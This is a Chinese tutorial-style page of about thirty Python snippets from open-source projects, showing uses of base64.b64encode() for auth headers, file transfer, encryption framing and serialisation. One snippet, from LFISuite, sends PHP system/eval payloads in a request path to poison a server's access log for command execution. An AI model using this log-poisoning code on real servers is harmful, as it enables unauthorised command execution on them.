Python base64 模块,b64encode() 实例源码

我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用base64.b64encode()

项目:openstack-deploy    作者:yaoice    | 项目源码 | 文件源码
def copy_from_host(module):
    """Read a file and return its base64-encoded contents through *module*.

    ``module.params`` supplies ``src`` (path to read) and ``compress``
    (truthy to zlib-compress the payload before encoding).  Problems with
    the source path are reported with ``module.fail_json``; the result is
    delivered with ``module.exit_json`` and contains:

    * ``content`` - base64 of the (optionally compressed) file bytes
    * ``sha1``    - hex SHA-1 of the *uncompressed* file bytes
    * ``mode``    - ``oct()`` of the permission bits of the file
    * ``source``  - the path that was read
    """
    params = module.params
    compress = params.get('compress')
    src = params.get('src')

    # Both checks are always evaluated, in this order.
    if not os.path.exists(src):
        module.fail_json(msg="file not found: {}".format(src))
    if not os.access(src, os.R_OK):
        module.fail_json(msg="file is not readable: {}".format(src))

    permission_bits = os.stat(src).st_mode & 0o777

    with open(src, 'rb') as handle:
        raw_data = handle.read()

    # The checksum always covers the original bytes, never the compressed form.
    digest = hashlib.sha1(raw_data).hexdigest()
    payload = raw_data
    if compress:
        payload = zlib.compress(raw_data)

    module.exit_json(
        content=base64.b64encode(payload),
        sha1=digest,
        mode=oct(permission_bits),
        source=src
    )
项目:kafka_store    作者:smyte    | 项目源码 | 文件源码
def save(self, buffer):
        """Upload *buffer* as an object in ``self.bucket``.

        The object name is ``buffer.path`` joined onto ``self.prefix``.  The
        base64 form of ``buffer.md5`` is sent as ``md5Hash`` and the record
        count is stored (as a string) in the object's metadata.
        """
        object_name = urljoin(self.prefix, buffer.path)

        rewound = buffer.get_rewound_file()
        md5_text = base64.b64encode(buffer.md5).decode('ascii')

        upload = http.MediaIoBaseUpload(rewound, 'application/octet-stream')
        object_body = {
            'md5Hash': md5_text,
            'metadata': {
                'count': str(buffer.count),
            },
        }
        request = self.objects.insert(
            media_body=upload,
            name=object_name,
            body=object_body,
            bucket=self.bucket,
        )
        request.execute()
项目:Stitch    作者:nathanlopez    | 项目源码 | 文件源码
def get_encryption():
    """Return Python source text for a generated AES helper module.

    The template is filled with ``st_obf[0]`` (used as the name of the key
    variable), ``aes_encoded`` (placed inside a ``base64.b64decode`` call)
    and ``aes_abbrev`` (assigned to ``abbrev``).  The generated code defines
    ``encrypt`` and ``decrypt`` using AES in CFB mode with the IV prepended
    to the ciphertext.
    """
    template = '''
import base64
from Crypto import Random
from Crypto.Cipher import AES

abbrev = '{2}'
{0} = base64.b64decode('{1}')

def encrypt(raw):
    iv = Random.new().read( AES.block_size )
    cipher = AES.new({0}, AES.MODE_CFB, iv )
    return (base64.b64encode( iv + cipher.encrypt( raw ) ) )

def decrypt(enc):
    enc = base64.b64decode(enc)
    iv = enc[:16]
    cipher = AES.new({0}, AES.MODE_CFB, iv )
    return cipher.decrypt( enc[16:] )
'''
    return template.format(st_obf[0],aes_encoded,aes_abbrev)

################################################################################
#                       st_protocol.py stitch_gen variables                    #
################################################################################
项目:newsreap    作者:caronc    | 项目源码 | 文件源码
def encode_public_key(self):
        """
        Return the public key gzip-compressed and then base64-encoded.

        Based on spotnab, this is the gzipped version of the key
        with base64 applied to it. We encode it as such and
        return it.

        Returns None when writing the key raises TypeError (the key was
        not initialized yet).
        """
        # Imported here so this method does not depend on the file's
        # top-level import list.
        from io import BytesIO

        # gzip produces binary output, so it has to be collected in a bytes
        # buffer; a text buffer rejects it on Python 3.
        fileobj = BytesIO()
        with GzipFile(fileobj=fileobj, mode="wb") as f:
            try:
                f.write(self.public_pem())
            except TypeError:
                # It wasn't initialized yet
                return None

        # The gzip stream is complete only after the `with` block closed it.
        return b64encode(fileobj.getvalue())
项目:IotCenter    作者:panjanek    | 项目源码 | 文件源码
def handleServerCall(self, payload):
        """Handle a JSON callback sent by the server.

        *payload* is a JSON document.  When it contains a ``command`` key the
        command is logged and dispatched:

        * ``blink`` / ``reboot`` - only logged
        * ``photo`` - the JPEG at a fixed path is read, base64-encoded and
          sent through ``self.service.sendMessage`` as a JSON message
        * anything else - logged as unknown

        Payloads without a ``command`` key are ignored after the initial log
        line.
        """
        self.logger.info("Handling server callback with payload {0}".format(payload))
        payloadDict = json.loads(payload)
        if "command" not in payloadDict:
            return

        command = payloadDict["command"]
        self.logger.info("Received command: {0}".format(command))
        if command == "blink":
            self.logger.info("BLINK!!!")
        elif command == "reboot":
            self.logger.info("REBOOT!!!")
        elif command == "photo":
            self.logger.info("PHOTO!!!")
            photoFile = "/home/pi/puszcz.jpg"
            with open(photoFile, mode='rb') as photo:
                photoData = photo.read()
            # b64encode returns bytes on Python 3, which json.dumps rejects;
            # the base64 alphabet is pure ASCII so decoding is lossless.
            base64data = base64.b64encode(photoData).decode('ascii')
            self.service.sendMessage(json.dumps({'image':base64data, 'type':'jpg'}))
        else:
            self.logger.info("Command '{0}' unknown".format(command))
项目:DropboxConnect    作者:raguay    | 项目源码 | 文件源码
def encode_primitive(self, validator, value):
        """Encode a primitive *value* according to its *validator*.

        An alias validator registered for *validator* is run first.  Then:
        Void encodes to None, Timestamp is formatted with the validator's
        format, Bytes is returned raw for msgpack or as base64 text
        otherwise, and every other value is returned unchanged except that a
        bool under an Integer validator becomes 0 or 1.
        """
        if validator in self.alias_validators:
            self.alias_validators[validator](value)

        if isinstance(validator, bv.Void):
            return None
        if isinstance(validator, bv.Timestamp):
            return _strftime(value, validator.format)
        if isinstance(validator, bv.Bytes):
            if self.for_msgpack:
                return value
            return base64.b64encode(value).decode('ascii')
        if isinstance(validator, bv.Integer) and isinstance(value, bool):
            # bool is a subclass of int, so it passes Integer validation;
            # emit ``0`` / ``1`` rather than ``False`` / ``True``.
            return int(value)
        return value
项目:Home-Assistant    作者:jmart518    | 项目源码 | 文件源码
def main(args):
    """Configure and run the HTTP(S) server until interrupted.

    :param args: command-line arguments; when non-empty, the first item is
        passed to ``load_settings``.

    When ``CREDENTIALS`` is set it is replaced by its base64 encoding and the
    authenticating handler is used.  When ``SSL_CERTIFICATE`` is set the
    listening socket is wrapped in TLS.  If ``BASEPATH`` is set the process
    changes into that directory before serving.
    """
    global HTTPD, CREDENTIALS
    if args:
        load_settings(args[0])
    print("Starting server")
    server_address = (LISTENIP, LISTENPORT)
    if CREDENTIALS:
        CREDENTIALS = base64.b64encode(bytes(CREDENTIALS, "utf-8"))
        Handler = AuthHandler
    else:
        Handler = RequestHandler
    if not SSL_CERTIFICATE:
        HTTPD = HTTPServer(server_address, Handler)
    else:
        HTTPD = socketserver.TCPServer(server_address, Handler)
        # ssl.wrap_socket() is deprecated and was removed in Python 3.12;
        # an SSLContext is the supported way to wrap a server socket.
        context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
        context.load_cert_chain(certfile=SSL_CERTIFICATE, keyfile=SSL_KEY)
        HTTPD.socket = context.wrap_socket(HTTPD.socket, server_side=True)
    print('Listening on: %s://%s:%i' % ('https' if SSL_CERTIFICATE else 'http',
                                        LISTENIP,
                                        LISTENPORT))
    if BASEPATH:
        os.chdir(BASEPATH)
    HTTPD.serve_forever()
项目:NS_Proj    作者:drstarry    | 项目源码 | 文件源码
def vPrint(actor, sent, otherActor, toPrint, base64encode=True):
    """Print a labelled, length-limited message when VERBOSE is enabled.

    :param actor: name shown on the left of the label
    :param sent: truthy for ``actor -> otherActor``, falsy for
        ``actor <- otherActor``
    :param otherActor: name shown on the right of the label
    :param toPrint: a string or a list of strings to display; other types
        are printed as-is
    :param base64encode: base64-encode the string(s) before printing

    A single string is cut to 100 characters after encoding; list items of
    100 or more characters are cut to 100 before encoding.  Cut values get a
    ``...`` suffix.
    """
    if not VERBOSE:
        return

    def _b64_text(data):
        # b64encode only accepts bytes; on Python 3 text must be encoded
        # first and the result decoded so '...' can be appended to it.
        if not isinstance(data, bytes):
            data = data.encode('utf-8')
        encoded = b64encode(data)
        if not isinstance(encoded, str):
            encoded = encoded.decode('ascii')
        return encoded

    arrow = "->" if sent else "<-"
    # Pad short labels to 12 columns so successive lines align.
    label = ("%s %s %s" % (actor, arrow, otherActor)).ljust(12)

    if isinstance(toPrint, str):
        if base64encode:
            toPrint = _b64_text(toPrint)
        if len(toPrint) > 100:
            toPrint = toPrint[:100] + "..."
    elif isinstance(toPrint, list):
        if base64encode:
            toPrint = [_b64_text(x) if len(x) < 100
                       else _b64_text(x[:100]) + '...' for x in toPrint]
        else:
            toPrint = [x if len(x) < 100
                       else x[:100] + '...' for x in toPrint]
    # A single parenthesised argument prints identically on Python 2 and 3.
    print("%s: <%s>" % (label, toPrint))
项目:python-libjuju    作者:juju    | 项目源码 | 文件源码
def _http_headers(self):
        """Build the HTTP headers for connecting to this Connection's endpoint.

        :return: ``{}`` when no usertag is set, otherwise a dictionary with a
            Basic ``Authorization`` header built from the usertag and the
            password (an empty password is used when none is set).

        """
        if self.usertag:
            credentials = u'{}:{}'.format(self.usertag, self.password or '')
            encoded = base64.b64encode(credentials.encode()).decode()
            return {'Authorization': 'Basic {}'.format(encoded)}
        return {}
项目:cbapi-python    作者:carbonblack    | 项目源码 | 文件源码
def __init__(self, **kwargs):
        """Store the feed descriptor fields and inline any icon files.

        All keyword arguments are kept in ``self.data``.  For ``icon`` and
        ``icon_small``, when the value is a path that exists on disk it is
        replaced by the base64 encoding of that file's contents.

        :raises CbIconError: if an existing icon file cannot be read or
            encoded.
        """
        # these fields are required in every feed descriptor
        self.required = ["name", "display_name",
                         "summary", "tech_data", "provider_url"]
        self.optional = ["category", "icon", "version", "icon_small"]
        self.noemptystrings = ["name", "display_name", "summary", "tech_data", "category"]
        self.data = kwargs

        # if they are present, set the icon fields of the data to hold
        # the base64 encoded file data from their path
        for icon_field in ["icon", "icon_small"]:
            if icon_field in self.data and os.path.exists(self.data[icon_field]):
                icon_path = self.data.pop(icon_field)
                try:
                    # `with` guarantees the handle is closed even on error
                    with open(icon_path, "rb") as icon_file:
                        self.data[icon_field] = base64.b64encode(icon_file.read())
                except Exception as err:
                    raise CbIconError("Unknown error reading/encoding icon data: %s" % err)
项目:LFISuite    作者:D35m0nd142    | 项目源码 | 文件源码
def send_access_log_cmd(cmd,host,keyword):
    """Request a URL on *host* whose path embeds *cmd* inside a PHP tag.

    *keyword* selects both the wrapper and the HTTP verb:

    * containing ``_PHP``: the last four characters of *keyword* are dropped;
      *cmd* is wrapped in ``eval(base64_decode(...))`` when it contains a
      space, otherwise it is embedded verbatim
    * otherwise: *cmd* is wrapped in ``system(base64_decode(...))``
    * containing ``GET`` a GET request is sent, else a HEAD request

    The response is not inspected and nothing is returned.
    """
    path = ""

    if("_PHP" in keyword):
        # strip the 4-character suffix so only the verb part remains
        keyword = keyword[:-4]
        if(" " in cmd):
            b64cmd = base64.b64encode(cmd)
            path = "/<?php eval(base64_decode('%s'));?>" %(b64cmd)
        else:
            path = "/<?php %s?>" %(cmd)
    else:
        b64cmd = base64.b64encode(cmd)
        path = "/<?php system(base64_decode('%s'));?>" %(b64cmd)

    # NOTE(review): the session class name suggests the path is sent without
    # URL-encoding - confirm against its definition.
    s = NoURLEncodingSession()
    # `path` already starts with '/', so the URL contains a double slash
    url = "%s/%s" %(host,path)

    if("GET" in keyword):
        s.get(url, headers=gen_headers)
    else:
        s.head(url, headers=gen_headers)
项目:sensu_drive    作者:ilavender    | 项目源码 | 文件源码
def sensu_event_resolve(message):
    """POST a resolve request to the Sensu API for ``message['entity']``.

    The entity has the form ``client:check``.  A 202 reply releases the
    connection; any other status is logged as an error.  Exceptions raised
    while building or sending the request are logged and re-raised.
    """
    endpoint = settings.SENSU_API_URL + '/resolve'
    credentials = "%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD)
    userAndPass = base64.b64encode(str.encode(credentials)).decode("ascii")
    headers = {
        'X_REQUESTED_WITH': 'XMLHttpRequest',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Authorization': 'Basic %s' % userAndPass,
    }

    try:
        client_name, check_name = message['entity'].split(':')
        payload = json.dumps({"client": client_name, "check": check_name})
        reply = http.request('POST', endpoint, body=payload, headers=headers)
        status = reply.status

        if status != 202:
            logger.error('response: %s' % str(status))
        else:
            reply.release_conn()

    except:
        # log for context, then let the caller see the original exception
        logger.error("sensu_event_resolve failed resolving entity: %s" % message['entity'])
        raise
项目:sensu_drive    作者:ilavender    | 项目源码 | 文件源码
def sensu_client_delete(message):
    """DELETE the client named ``message['client']`` through the Sensu API.

    Returns True when the API answers 202 (the connection is released
    first) and False for any other status, which is logged.  Exceptions
    raised by the request are logged and re-raised.
    """
    endpoint = settings.SENSU_API_URL + '/clients/' + message['client']
    credentials = "%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD)
    userAndPass = base64.b64encode(str.encode(credentials)).decode("ascii")
    headers = {
        'X_REQUESTED_WITH': 'XMLHttpRequest',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Authorization': 'Basic %s' % userAndPass,
    }

    try:
        reply = http.request('DELETE', endpoint, headers=headers)
        status = reply.status

        if status != 202:
            logger.error("sensu_client_delete api request failed: %s" % str(status))
            return False
        reply.release_conn()
        return True
    except:
        # log for context, then let the caller see the original exception
        logger.error("sensu_client_delete failed deleting client: %s" % message['client'])
        raise
项目:sensu_drive    作者:ilavender    | 项目源码 | 文件源码
def sensu_result_delete(message):
    """DELETE the stored result for ``message['client']`` / ``message['check']``.

    Returns True when the API answers 204 (the connection is released
    first) and False for any other status, which is logged.  Exceptions
    raised by the request are logged and re-raised.
    """
    endpoint = settings.SENSU_API_URL + '/results/' + message['client'] + '/' + message['check']
    credentials = "%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD)
    userAndPass = base64.b64encode(str.encode(credentials)).decode("ascii")
    headers = {
        'X_REQUESTED_WITH': 'XMLHttpRequest',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Authorization': 'Basic %s' % userAndPass,
    }

    try:
        reply = http.request('DELETE', endpoint, headers=headers)
        status = reply.status

        if status != 204:
            logger.error("sensu_result_delete api request failed: %s" % str(status))
            return False
        reply.release_conn()
        return True
    except:
        # log for context, then let the caller see the original exception
        logger.error("sensu_result_delete failed deleting client: %s check: %s" % (message['client'], message['check']))
        raise
项目:plugin.video.exodus    作者:lastship    | 项目源码 | 文件源码
def __init__(self):
        """Set the ororo.tv endpoints and the request headers.

        The user name and password are read from the add-on settings and
        combined into a Basic ``Authorization`` header.
        """
        self.priority = 1
        self.language = ['en']
        self.domains = ['ororo.tv']

        # API endpoints, relative to base_link
        self.base_link = 'https://ororo.tv'
        self.moviesearch_link = '/api/v2/movies'
        self.tvsearch_link = '/api/v2/shows'
        self.movie_link = '/api/v2/movies/%s'
        self.show_link = '/api/v2/shows/%s'
        self.episode_link = '/api/v2/episodes/%s'

        self.user = control.setting('ororo.user')
        self.password = control.setting('ororo.pass')

        credentials = '%s:%s' % (self.user, self.password)
        authorization = 'Basic %s' % base64.b64encode(credentials)
        self.headers = {
            'Authorization': authorization,
            'User-Agent': 'Exodus for Kodi',
        }
项目:oscars2016    作者:0x0ece    | 项目源码 | 文件源码
def _to_json(self, strip, to_serialize=None):
        """Create the JSON representation of this credentials object.

        PKCS#12 key material is not JSON serializable in general, so it is
        base64-encoded before the parent implementation is invoked.

        Args:
            strip: array, An array of names of members to exclude from the
                   JSON.
            to_serialize: dict, (Optional) The properties for this object
                          that will be serialized. When omitted, a shallow
                          copy of the instance ``__dict__`` is used.

        Returns:
            string, a JSON representation of this instance, suitable to pass to
            from_json().
        """
        payload = to_serialize
        if payload is None:
            payload = copy.copy(self.__dict__)

        raw_key = payload.get(_PKCS12_KEY)
        if raw_key is not None:
            payload[_PKCS12_KEY] = base64.b64encode(raw_key)

        parent = super(ServiceAccountCredentials, self)
        return parent._to_json(strip, to_serialize=payload)
项目:os-xenapi    作者:openstack    | 项目源码 | 文件源码
def get_console_log(session, arg_dict):
    """Return the tail of a domain's console log, compressed and encoded.

    :param session: not used by this function
    :param arg_dict: must contain ``dom_id``, a value convertible to int
    :returns: base64 encoding of the zlib-compressed bytes returned by
        ``_last_bytes`` for the domain's console log file
    :raises dom0_pluginlib.PluginError: if ``dom_id`` is missing or not an
        integer, or if reading the log raises IOError
    """
    try:
        raw_dom_id = arg_dict['dom_id']
    except KeyError:
        raise dom0_pluginlib.PluginError("Missing dom_id")
    try:
        dom_id = int(raw_dom_id)
    except ValueError:
        raise dom0_pluginlib.PluginError("Invalid dom_id")

    # The open() itself is outside the try blocks below, so a failure to
    # open the log propagates to the caller unchanged.
    logfile = open(CONSOLE_LOG_FILE_PATTERN % dom_id, 'rb')
    # NOTE(review): the nested try/finally and the old-style except clause
    # look deliberate for a legacy interpreter - confirm before modernising.
    try:
        try:
            log_content = _last_bytes(logfile)
        except IOError, e:  # noqa
            msg = "Error reading console: %s" % e
            logging.debug(msg)
            raise dom0_pluginlib.PluginError(msg)
    finally:
        # always close the log, on success and on error
        logfile.close()

    return base64.b64encode(zlib.compress(log_content))
项目:os-xenapi    作者:openstack    | 项目源码 | 文件源码
def test_inject_file_with_old_agent(self):
        """inject_file falls back to the single-value form for old agents.

        With the agent features patched to ``'injectfile'``, the path and
        contents are expected to be combined as base64 of ``"path,contents"``
        and written as one xenstore record.
        """
        # This is an alias of FAKE_ARG_DICT, not a copy: the updates below
        # are visible through both names.
        expected_args = FAKE_ARG_DICT
        request_id = expected_args["id"]
        decoded_path = base64.b64decode(expected_args["b64_path"])
        decoded_file = base64.b64decode(expected_args["b64_contents"])
        combined = base64.b64encode("%s,%s" % (decoded_path, decoded_file))

        self.mock_patch_object(self.agent,
                               '_get_agent_features',
                               'injectfile')
        expected_args["value"] = json.dumps({"name": "injectfile",
                                             "value": combined})
        expected_args["path"] = "data/host/%s" % request_id

        self.agent.inject_file(self.agent, FAKE_ARG_DICT)

        self.agent._wait_for_agent.assert_called_once()
        self.agent.xenstore.write_record.assert_called_with(self.agent,
                                                            expected_args)
        self.agent._get_agent_features.assert_called_once()
项目:Projects    作者:it2school    | 项目源码 | 文件源码
def encode_primitive(self, validator, value):
        """Encode a primitive *value* according to its *validator*.

        An alias validator registered for *validator* is run first.  Then:
        Void encodes to None, Timestamp is formatted with the validator's
        format, Bytes is returned raw for msgpack or as base64 text
        otherwise, and every other value is returned unchanged except that a
        bool under an Integer validator becomes 0 or 1.
        """
        if validator in self.alias_validators:
            self.alias_validators[validator](value)

        if isinstance(validator, bv.Void):
            return None
        if isinstance(validator, bv.Timestamp):
            return _strftime(value, validator.format)
        if isinstance(validator, bv.Bytes):
            if self.for_msgpack:
                return value
            return base64.b64encode(value).decode('ascii')
        if isinstance(validator, bv.Integer) and isinstance(value, bool):
            # bool is a subclass of int, so it passes Integer validation;
            # emit ``0`` / ``1`` rather than ``False`` / ``True``.
            return int(value)
        return value
项目:shadowsocksR-b    作者:hao35954514    | 项目源码 | 文件源码
def client_udp_pre_encrypt(self, buf):
        """Encrypt and frame an outgoing client UDP payload.

        On first use the user key and id are taken from the
        ``uid:key`` protocol parameter; if that is absent or cannot be
        parsed, a random 4-byte id and the server key are used instead.

        The returned packet is: RC4-encrypted *buf*, random padding, 3 random
        auth bytes, the 4-byte user id XOR-masked with the auth digest, and
        the first byte of an HMAC (keyed with the user key) over everything
        before it.
        """
        if self.user_key is None:
            protocol_param = to_bytes(self.server_info.protocol_param)
            if b':' in protocol_param:
                try:
                    # The parameter is bytes, so the separator must be bytes
                    # too; a str separator raises TypeError on Python 3.
                    items = protocol_param.split(b':')
                    user_key = self.hashfunc(items[1]).digest()
                    user_id = struct.pack('<I', int(items[0]))
                except Exception:
                    # Best effort: an unusable parameter falls through to the
                    # random id / server key defaults below.
                    pass
                else:
                    # Assign both together so a parse failure can never leave
                    # a key without a matching id.
                    self.user_key = user_key
                    self.user_id = user_id
            if self.user_key is None:
                self.user_id = os.urandom(4)
                self.user_key = self.server_info.key
        authdata = os.urandom(3)
        mac_key = self.server_info.key
        md5data = hmac.new(mac_key, authdata, self.hashfunc).digest()
        # mask the user id with the first 4 bytes of the auth digest
        uid = struct.unpack('<I', self.user_id)[0] ^ struct.unpack('<I', md5data[:4])[0]
        uid = struct.pack('<I', uid)
        rand_len = self.udp_rnd_data_len(md5data, self.random_client)
        # per-packet RC4 key: base64(user key) + base64(auth digest)
        encryptor = encrypt.Encryptor(to_bytes(base64.b64encode(self.user_key)) + to_bytes(base64.b64encode(md5data)), 'rc4')
        out_buf = encryptor.encrypt(buf)
        buf = out_buf + os.urandom(rand_len) + authdata + uid
        return buf + hmac.new(self.user_key, buf, self.hashfunc).digest()[:1]
项目:shadowsocksR-b    作者:hao35954514    | 项目源码 | 文件源码
def server_udp_pre_encrypt(self, buf, uid):
        """Encrypt and frame an outgoing server UDP payload for user *uid*.

        The key is the one registered for *uid*; for an unknown uid it is the
        server key when no users are configured, otherwise ``recv_iv``.

        The returned packet is: RC4-encrypted *buf*, random padding, 7 random
        auth bytes, and the first byte of an HMAC (keyed with the user key)
        over everything before it.
        """
        if uid in self.server_info.users:
            user_key = self.server_info.users[uid]
        else:
            uid = None
            if not self.server_info.users:
                user_key = self.server_info.key
            else:
                user_key = self.server_info.recv_iv
        authdata = os.urandom(7)
        mac_key = self.server_info.key
        # digest of the random auth bytes, keyed with the server key
        md5data = hmac.new(mac_key, authdata, self.hashfunc).digest()
        rand_len = self.udp_rnd_data_len(md5data, self.random_server)
        # per-packet RC4 key: base64(user key) + base64(auth digest)
        encryptor = encrypt.Encryptor(to_bytes(base64.b64encode(user_key)) + to_bytes(base64.b64encode(md5data)), 'rc4')
        out_buf = encryptor.encrypt(buf)
        buf = out_buf + os.urandom(rand_len) + authdata
        # only the first HMAC byte is appended as a checksum
        return buf + hmac.new(user_key, buf, self.hashfunc).digest()[:1]
项目:shadowsocksR-b    作者:hao35954514    | 项目源码 | 文件源码
def server_udp_post_decrypt(self, buf):
        """Verify and decrypt a UDP packet received by the server.

        The trailer read from *buf* is: ``buf[-8:-5]`` auth bytes,
        ``buf[-5:-1]`` masked user id, ``buf[-1:]`` one-byte checksum.

        :returns: ``(payload, uid)``; ``uid`` is None when the id is not a
            registered user, and ``(b'', None)`` is returned when the
            checksum does not match.
        """
        mac_key = self.server_info.key
        # digest of the 3 auth bytes, keyed with the server key
        md5data = hmac.new(mac_key, buf[-8:-5], self.hashfunc).digest()
        # unmask the user id with the first 4 digest bytes
        uid = struct.unpack('<I', buf[-5:-1])[0] ^ struct.unpack('<I', md5data[:4])[0]
        uid = struct.pack('<I', uid)
        if uid in self.server_info.users:
            user_key = self.server_info.users[uid]
        else:
            uid = None
            if not self.server_info.users:
                user_key = self.server_info.key
            else:
                user_key = self.server_info.recv_iv
        # the last byte must equal the first HMAC byte over the rest
        if hmac.new(user_key, buf[:-1], self.hashfunc).digest()[:1] != buf[-1:]:
            return (b'', None)
        rand_len = self.udp_rnd_data_len(md5data, self.random_client)
        # per-packet RC4 key: base64(user key) + base64(auth digest)
        encryptor = encrypt.Encryptor(to_bytes(base64.b64encode(user_key)) + to_bytes(base64.b64encode(md5data)), 'rc4')
        # drop the 8-byte trailer and the random padding before decrypting
        out_buf = encryptor.decrypt(buf[:-8 - rand_len])
        return (out_buf, uid)
项目:privcount    作者:privcount    | 项目源码 | 文件源码
def handshake_hmac_get(handshake_key, prefix, server_cookie,
                           client_cookie):
        '''
        Compute HMAC(handshake_key, prefix | server_cookie | client_cookie)
        and return it base-64 encoded.

        The result is checked with handshake_hmac_verify in an assertion
        before it is returned.
        '''
        cookies = server_cookie + client_cookie
        encoded = b64encode(get_hmac(handshake_key, prefix, cookies))
        # self-check: the value just produced must verify
        assert PrivCountProtocol.handshake_hmac_verify(encoded,
                                                       handshake_key,
                                                       prefix,
                                                       server_cookie,
                                                       client_cookie)
        return encoded
项目:charm-keystone    作者:openstack    | 项目源码 | 文件源码
def get_ssl_ca_settings():
    """ Collect the Certificate Authority settings clients need for https

    :returns: Dictionary with https_keystone and ca_cert set when the
              https-service-endpoints option is enabled, otherwise an
              empty dictionary
    """
    endpoints_option = config('https-service-endpoints')
    if not (endpoints_option and bool_from_string(endpoints_option)):
        return {}

    # Clients need the CA cert to verify https connections
    authority = get_ca(user=SSH_USER)
    bundle = authority.get_ca_bundle()
    return {
        'https_keystone': 'True',
        'ca_cert': b64encode(bundle),
    }
项目:charm-keystone    作者:openstack    | 项目源码 | 文件源码
def get_ssl_ca_settings():
    """ Collect the Certificate Authority settings clients need for https

    :returns: Dictionary with https_keystone and ca_cert set when the
              https-service-endpoints option is enabled, otherwise an
              empty dictionary
    """
    endpoints_option = config('https-service-endpoints')
    if not (endpoints_option and bool_from_string(endpoints_option)):
        return {}

    # Clients need the CA cert to verify https connections
    authority = get_ca(user=SSH_USER)
    bundle = authority.get_ca_bundle()
    return {
        'https_keystone': 'True',
        'ca_cert': b64encode(bundle),
    }
项目:FRG-Crowdsourcing    作者:97amarnathk    | 项目源码 | 文件源码
def get_disqus_sso_payload(user):
    """Return the Disqus SSO message, timestamp, signature and public key.

    When either Disqus key is missing from the app config, four ``None``
    values are returned.  Otherwise the user's id, name and e-mail (or an
    empty object when *user* is falsy) are JSON-encoded and base64-encoded,
    and the message plus timestamp is signed with HMAC-SHA1 using the
    secret key.
    """
    public_key = current_app.config.get('DISQUS_PUBLIC_KEY')
    secret_key = current_app.config.get('DISQUS_SECRET_KEY')
    if not (public_key and secret_key):
        return None, None, None, None

    profile = {}
    if user:
        profile = {
            'id': user.id,
            'username': user.name,
            'email': user.email_addr,
        }
    # base64 of the JSON profile is the message that gets signed
    message = base64.b64encode(simplejson.dumps(profile))
    # the signature covers "<message> <timestamp>"
    timestamp = int(time.time())
    signed_text = '%s %s' % (message, timestamp)
    sig = hmac.HMAC(secret_key, signed_text, hashlib.sha1).hexdigest()

    return message, timestamp, sig, public_key
项目:TanksAndTemples    作者:IntelVCL    | 项目源码 | 文件源码
def generate_md5_file(md5_check_fn, scene_list):
    """Write a checksum listing for the ``.ply`` and ``.log`` file of each scene.

    :param md5_check_fn: path of the listing file to (over)write
    :param scene_list: iterable of scene path prefixes; ``.ply`` and ``.log``
        are appended to each

    For every scene two lines ``<file>###<base64 md5>`` are written, the
    ``.ply`` line first.  A file that does not exist gets an empty checksum.
    The same values are also printed.
    """
    def _encoded_md5(path):
        # presumably generate_file_md5 returns the raw digest bytes - confirm
        # against its definition.  Missing files use an empty *bytes* digest
        # so b64encode also works on Python 3.
        if os.path.isfile(path):
            digest = generate_file_md5(path, blocksize=2**20)
        else:
            digest = b''
        return base64.b64encode(digest)

    # `with` closes the listing even if hashing or writing fails part-way
    with open(md5_check_fn, 'wb') as md5_check:
        for scene in scene_list:
            ply_file = scene + '.ply'
            log_file = scene + '.log'
            content_md5_ply = _encoded_md5(ply_file)
            content_md5_log = _encoded_md5(log_file)
            print('md5_ply_file: ', ply_file, content_md5_ply)
            print('md5_log_file: ',log_file, content_md5_log)
            for name, content in ((ply_file, content_md5_ply),
                                  (log_file, content_md5_log)):
                line = "%s###%s\n" % (name, content.decode('UTF-8'))
                # the file is opened in binary mode, so write bytes
                md5_check.write(line.encode('UTF-8'))
项目:swjtu-pyscraper    作者:Desgard    | 项目源码 | 文件源码
def _tag(value):
    """Recursively convert *value* into a JSON-friendly tagged form.

    Tuples, UUIDs, bytes, objects with ``__html__`` and datetimes become
    single-key dicts (`` t``, `` u``, `` b``, `` m``, `` d``); lists and
    dicts are converted element-wise; ``str`` is converted to text; anything
    else is returned unchanged.  The checks are order-sensitive.
    """
    if isinstance(value, tuple):
        return {' t': [_tag(item) for item in value]}
    if isinstance(value, uuid.UUID):
        return {' u': value.hex}
    if isinstance(value, bytes):
        return {' b': b64encode(value).decode('ascii')}
    if callable(getattr(value, '__html__', None)):
        return {' m': text_type(value.__html__())}
    if isinstance(value, list):
        return [_tag(item) for item in value]
    if isinstance(value, datetime):
        return {' d': http_date(value)}
    if isinstance(value, dict):
        return dict((key, _tag(item)) for key, item in iteritems(value))
    if isinstance(value, str):
        try:
            return text_type(value)
        except UnicodeError:
            from flask.debughelpers import UnexpectedUnicodeError
            raise UnexpectedUnicodeError(u'A byte string with '
                u'non-ASCII data was passed to the session system '
                u'which can only store unicode strings.  Consider '
                u'base64 encoding your string (String was %r)' % value)
    return value
项目:TerminalView    作者:Wramberg    | 项目源码 | 文件源码
def html(self):
        """
        Render :attr:`self.file_obj` as HTML whose ``src`` is a data URI.

        Returns an empty string when there is no file object.  The link
        points at the original file's name when one is set, otherwise at the
        name part of :attr:`self.path`.  The icon template is used when a
        thumbnail is set, the plain template otherwise.
        """
        if not self.file_obj:
            return u""

        # Read the whole file from the start and embed it as base64
        self.file_obj.seek(0)
        payload = base64.b64encode(self.file_obj.read()).decode('utf-8')
        data_uri = "data:{mimetype};base64,{encoded}".format(
            mimetype=self.mimetype, encoded=payload)

        target = self.path
        if self.original_file:
            target = self.original_file.name
        link = "%s/%s" % (self.linkpath, os.path.split(target)[1])

        if not self.thumbnail:
            return self.html_template.format(
                link=link, src=data_uri, mimetype=self.mimetype)
        return self.html_icon_template.format(
            link=link,
            src=data_uri,
            icon=self.thumbnail,
            mimetype=self.mimetype)
项目:PTE    作者:pwn2winctf    | 项目源码 | 文件源码
def add(self, msg_text, to=None):
        """Append a news message, save, and push the change.

        Without *to* the text is stored as-is for everyone.  With *to* the
        text is sealed with that team's ``crypt_pk`` key and stored
        base64-encoded together with the recipient name.
        """
        current_time = int(time.time())
        if to is not None:
            recipient_key = Team(name=to)['crypt_pk']
            sealed = pysodium.crypto_box_seal(msg_text.encode("utf-8"),
                                              recipient_key)
            message = {"msg": b64encode(sealed).decode("utf-8"),
                       "to": to,
                       "time": current_time}
        else:
            message = {"msg": msg_text, "time": current_time}

        self.append(message)
        self.save()

        # Messages without a recipient are addressed to everyone
        dest = message.get("to", "all")
